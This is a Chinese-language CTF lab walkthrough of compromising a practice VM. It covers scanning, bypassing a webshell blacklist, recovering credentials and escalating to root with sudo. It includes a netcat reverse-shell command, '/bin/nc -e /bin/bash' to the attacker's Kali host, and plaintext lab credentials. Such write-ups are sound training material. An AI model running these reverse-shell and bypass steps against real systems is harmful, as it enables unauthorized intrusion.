测试环境:靶机+kali
1.nmap扫描存活主机,发现靶机ip为192.168.152.132
2.对目标主机进行全端口扫描
3.尝试访问ftp,发现有权限设置
4.尝试访问80端口
查看网站内页面
新闻页面无可用信息
关于我们页面无可用信息
通过联系我们页面中的邮箱可以猜测Bob为管理员
登录页面不存在
5.尝试访问25468端口,发现无法访问
6.对80端口进行目录扫描
发现robots.txt
7.访问robots.txt,发现数个文件提示
尝试访问以上文件
login.php页面无法访问
在dev_shell.php页面发现一个webshell,稍后可以加以利用
lat_memo.html提示该网站有webshell但是有一定的防护
passwords.html无可用信息
8.尝试利用webshell
whoami查看当前用户
ls查看当前目录,发现被屏蔽,推测该webshell设置有黑名单
尝试用/bin/ls绕过屏蔽,发现成功绕过
9.尝试通过echo写入一句话木马,发现有安全监测
10.尝试通过nc连接到shell
开启kali的nc监听
通过运行/bin/nc -e /bin/bash 192.168.152.130 6666 拿到shell
11.在根目录下发现flag.txt
尝试打开flag.txt,发现无法查看
查看权限后发现需要root权限
12.查看家目录,发现数个用户
通过对网页信息分析,猜测Bob为管理员,故对Bob展开信息收集
13. 发现关键字段password,打开查看,发现用户名jc密码Qwerty
14.在documents目录下发现可能有用的文件
发现login.txt.gpg无法打开,staff.txt无可用信息
再进入secret目录,再进入keep_out目录,发现还有两个目录
先查看好康的文件夹,发现没什么好康的
查看不好康的文件夹,发现notes.sh,猜测与密码有些关系
15.调用命令行提示,切换用户为jc
16.尝试解压login.txt.gpg,通过猜测与尝试发现密码为notes.sh中的首字母集,得到Bob的密码
成功登陆Bob用户
17.通过Bob的管理员权限,通过sudo调用root权限,成功打开flag.txt
至此成功获取该靶机flag